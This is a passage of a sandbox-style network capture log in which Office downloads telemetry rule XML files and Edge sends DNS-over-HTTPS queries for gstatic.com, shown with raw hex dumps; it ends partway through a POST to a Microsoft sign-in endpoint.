                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:42 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                      x-ms-request-id: 2b8833b9-801e-0035-0b62-43752a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213842Z-174f7845968psccphC1EWRuz9s000000129000000000766y
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      93192.168.2.104983013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:42 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                      x-ms-request-id: e0e90f6b-301e-000c-3eb2-42323f000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213842Z-174f7845968frfdmhC1EWRxxbw00000011y000000000hpkf
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      94192.168.2.104983113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:42 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                      x-ms-request-id: 20bd7b2d-701e-001e-11a1-42f5e6000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213842Z-174f7845968cdxdrhC1EWRg0en000000120g00000000472s
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      95192.168.2.1049842172.64.41.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc6c4bbf80da-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      96192.168.2.1049848172.64.41.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc6c4e313354-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 21 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom!Hc)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      97192.168.2.1049847162.159.61.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc6c9cfd41bd-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      98192.168.2.1049850162.159.61.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc6d1cd37c82-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 07 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      99192.168.2.1049852172.64.41.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc6d3e88727d-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      100192.168.2.1049853172.64.41.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc6d4ff71a28-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 08 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      101192.168.2.104984020.190.147.7443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                                      Accept: */*
